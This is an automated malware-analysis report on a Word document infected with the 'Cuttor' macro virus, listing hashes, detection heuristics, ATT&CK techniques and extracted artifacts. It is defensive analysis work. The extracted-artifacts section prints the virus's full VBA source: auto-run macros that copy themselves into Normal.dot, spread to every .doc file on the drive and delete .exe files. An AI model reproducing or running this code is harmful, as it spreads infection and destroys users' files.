Cuttor Office (OLE) malware analysis — malicious · d8e8ac4ae8f4a58a

MALICIOUS

Office (OLE)

188.5 KB Created: 2001-04-06 10:02:00 Authoring application: Microsoft Word 9.0 First seen: 2012-10-03

MD5: f1ccaf26d4c50a7c5d2f9e1f2568af4f SHA-1: b7e26ce9d3324ae96c3b298922cdd34af9c8d5e6 SHA-256: d8e8ac4ae8f4a58a99b1296d5c8a98a750e8406725d401879cc34e08ae2afcb2

220 Risk Score

Malware Insights

Cuttor · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1083 File and Directory Discovery

The sample contains a VBA macro with an AutoOpen function, indicative of malicious intent. The macro attempts to create a file named 'SARC.dll' in the system directory and save the current document as 'EXE Cuttor.Doc' in the same location. It also attempts to copy the macro module to the Normal.dot template. The ClamAV detection signature 'Doc.Trojan.Cuttor-1' strongly suggests the Cuttor family.

Heuristics 5

OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514

Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3631 bytes
SHA-256: `5d9c4b29efe9e3f6b57376d96261a7fb61fb1d08445fbadb21eb6fc023012b72`
Detection ClamAV: Doc.Trojan.Cuttor-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module3" 'Macro suriv "EXE Cuttor" Sub autoopen() Set fs = CreateObject("Scripting.FileSystemObject") If fs.FileExists("C:\windows\system\SARC.dll") = False Then On Error Resume Next With ActiveDocument.AttachedTemplate Application.OrganizerDelete _ Source:="C:\Windows\Application Data\Microsoft\Modèles\Normal.dot", _ Name:="Module3", _ Object:=wdOrganizerObjectProjectItems End With On Error Resume Next ActiveDocument.SaveAs ("c:\windows\system\EXE Cuttor.Doc") Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:="c:\windows\Application data\microsoft\modèles\normal.dot", _ Name:="Module3", _ Object:=wdOrganizerObjectProjectItems Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile("c:\Windows\System\SARC.dll", True) a.Close On Error Resume Next Else On Error Resume Next Set fsb = CreateObject("Scripting.FileSystemObject") If fsb.FileExists("C:\Windows\system\EXE Cuttor.doc") = False Then MsgBox "Vous avez essaiez de schque ?!?!", vbExclamation + vbOKOnly, "Ou est passé EXE Cuttor.doc ???" MsgBox " >:-> ", vbExclamation + vbOKOnly, " :o) " Application.OnTime When:=Now + TimeValue("00:00:15"), _ Name:="Project.Module3.kill" End If Application.OrganizerCopy Source:="C:\Windows\system\EXE Cuttor.doc", _ Destination:=ActiveDocument.FullName, _ Name:="Module3", _ Object:=wdOrganizerObjectProjectItems End If End Sub Sub search() Dim fs As String With Application.FileSearch .NewSearch .LookIn = "C:\" .SearchSubFolders = True .FileName = ".doc" .MatchTextExactly = True .FileType = msoFileTypeAllFiles End With On Error Resume Next With Application.FileSearch If .Execute() > 0 Then For I = 1 To .FoundFiles.Count I.Attributes = I.Attributes - 1 Application.OrganizerCopy Source:="c:\windows\system\EXE Cuttor.doc", _ Destination:=.FoundFiles(I), _ Name:="Module3", _ Object:=wdOrganizerObjectProjectItems I.Attributes = I.Attributes + 0 I.Attributes = I.Attributes + 1 Next I Else End If End With Application.OnTime When:=Now + TimeValue("01:01:01"), _ Name:="Project.Module3.Destroye" End Sub Sub AutoNew() On Error Resume Next Application.OrganizerCopy Source:="C:\Windows\system\EXE Cuttor.doc", _ Destination:=ActiveDocument.FullName, _ Name:="Module3", _ Object:=wdOrganizerObjectProjectItems On Error Resume Next ActiveDocument.Save End Sub Sub Destroye() Dim po Set po = CreateObject("Scripting.FileSystemObject") With Application.FileSearch .NewSearch .LookIn = "C:\" .SearchSubFolders = True .FileName = ".exe" .MatchTextExactly = True .FileType = msoFileTypeAllFiles End With On Error Resume Next With Application.FileSearch If .Execute() > 0 Then For e = 0 To 2 po.deletefile .FoundFiles(e), True Next e Else End If End With End Sub Sub kill() MsgBox "Ma vengence va étre terrible !!!", vbCritical + vbOKOnly ActiveDocument.SaveAs ("c:\windows\system\EXE Cuttor.Doc") Call search End Sub 'Macro suriv "EXE Cuttor" Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1053155439/Ole10Native	38308 bytes
SHA-256: `0867a1853134f5b980288576dc975860f5066970bc44cc186611333171efae5f`
`ole10native_01.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1053159965/Ole10Native	52644 bytes
SHA-256: `9a7677895d9f1d869a93ae02c5694878cb0daa52f9bcea615a157fae9a4544ef`
`ole10native_02.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1053160635/Ole10Native	20196 bytes
SHA-256: `9bec50e4f528f9e357e2949fc011bdd418aed406ef81c21713472f90bfee7a15`

Open this report in the interactive analyzer, or submit your own file for analysis.